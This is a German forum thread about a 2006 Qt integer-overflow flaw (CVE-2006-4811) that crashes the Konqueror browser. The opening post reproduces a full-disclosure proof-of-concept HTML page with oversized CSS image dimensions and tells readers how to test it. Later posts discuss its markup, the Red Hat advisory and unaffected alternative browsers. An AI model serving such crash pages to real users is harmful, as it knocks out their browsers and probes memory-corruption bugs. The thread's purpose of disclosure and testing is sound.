Konqueror lässt sich durch Bilder zum Absturz bringen

[Fusselbär]

Wie heise.de berichtet,
lassen sich durch eine Sicherheitslücke im Konqueror Fehler ausnutzen.

Heise Artikel:
Qt-Fehler reißt Sicherheitsleck in Konqueror

Wer das mal selbst ausprobieren möchte:

 <html><head> 
<!-- 
Copyright Georgi Guninski 
may not be used in vulnerability databases - like mitre/symantec 
--> 
<style> 
IMG, DIV 
{ 
width: 16394px; 
height: 262160px; 
position: absolute; 
} 
</style> 
</head><body> 
<div> 
f3c 
</div> 
<img src=png1.png> 
</body> 
</html>

Und das dann z.B. als
CVE-2006-4811-qt-integer-overflow.html
abspeichern.
Als png1.png kann man irgendein PNG Bild
nach eigenem Geschmack nehmen,
welches in das gleiche Verzeichnis gesetzt wird.

Beim Aufruf dieser html Datei mit dem Konqueror stürzt dieser dann ab.

Nicht jedoch Opera 9.02 build 434 mit shared Qt.
Wer sich nicht scheut, so lange auf einen
Closed Source Webbrowser auszuweichen,
kann also durchaus einen Browser benutzen,
der auf Qt aufsetzt.
(Wie mich gerade jemand aufklärte,
soll Opera nur für die Menüs QT benutzen,
den Rest würde die Opera eigene Engine machen)

Zur Gegenprobe habe ich das auch mal mit Firefox
getestet (Version 2.0.r2,1)
womit ebenfalls nichts passiert.

Genau so wenig passiert mit Links (Version 2.1.p21,1)
im Grafikmodus (Schalter: -g)
auch der stürzt nicht ab.

Das wären also einige Ausweichmöglichkeiten,
bis die die Möglichkeit Konqueror anzugreifen,
geschlossen ist.

Ausprobiert habe ich das mit:
- FreeBSD 6.2-PRERELEASE i386
- qt-copy-3.3.6_2
- kdelibs-3.5.4_2
- kdebase-3.5.4_3


Gruß, Fusselbär

 

[nevix]

Wofür steht das ?

<div> 
f3c 
</div>

 

[Gecko]

Moin Fusselbär,

erstmal danke für den Hinweis wusste ich auch nicht, was mir allerdings zu Ohren getragen worden ist der Umstand dass es generell möglich ist bevorzugt auf M$ Systemen das über Bilder Schadecode ausgeführt werden kann.

So wie es nun aussieht geht das auch mit QT bassierten Anwendungen, hier also nun der Konqueror-Browser.

Danke nochmals das Du auch die Alternativen genannt hast auf die man dann ausweichen kann, den in der Tat gibt es ja viele Anwender die den Konquer nutzen.

Eine Frage möchte ich hier noch anfügen mir geht es wie nevixpain was bedeutet in diesem Kontext

 <div> 
f3c 
</div>

wäre dankbar für eine Erklärung ?

mfg Gecko

 

[Fusselbär]

Hallo,

also den Code für die html Seite, die Konqueror
zum Absturz bringt, habe ich hier gefunden:
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/49408

Das einzige was ich abgeändert habe, ist das hier:

<img src='/png1.png'>

zu

<img src=png1.png>

weil ich das zunächst einfach ganz local,
ohne Webserver, auf meinem FreeBSD
getestet habe und es mit der Version
mit Hochkommas und Slash so nicht angezeigt wird.
Die html Datei zum austesten und png Bild habe
ich zunächst einfach
in ein Verzeichnis gesetzt.

Auf einen Webserver gesetzt und die html Seite
dann mit Konquerer aufgerufen, produziert aber
genauso einen Konqueror Absturz. (ausprobiert)

Da die Verletztlichkeit zuerst von Red Hat Menschen entdeckt
und gefixt wurde:
https://rhn.redhat.com/errata/RHSA-2006-0720.html
vermute ich mal ,das es sich bei "fc3"
um einen Hinweis auf Fedora Core 3 Linux handelt.

Ersetzt man das "fc3" z.B. durch "FreeBSD" stürzt
Konqueror genauso zuverlässig ab wie mit "fc3". (ausprobiert)

Wollte bloß nicht mehr vom Code von:
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/49408
ändern, als unbedingt notwendig,
damit es gleich auf Anhieb läuft.
Außerdem habe ich das ja nicht entdeckt,
sondern Georgi Guninski.

@Gecko:
Yepp,
da war mal genauso ein Mechanismus,
der den IE zum Absturz brachte.
Maße von irgendeinem x-beliebigem Bild im html Code
absurd groß angegeben und schon macht es "fump".


Gruß, Fusselbär

 

[-Daemon-]

 <div> 
f3c 
</div>

Das ist ne div-Box - ganz harmlos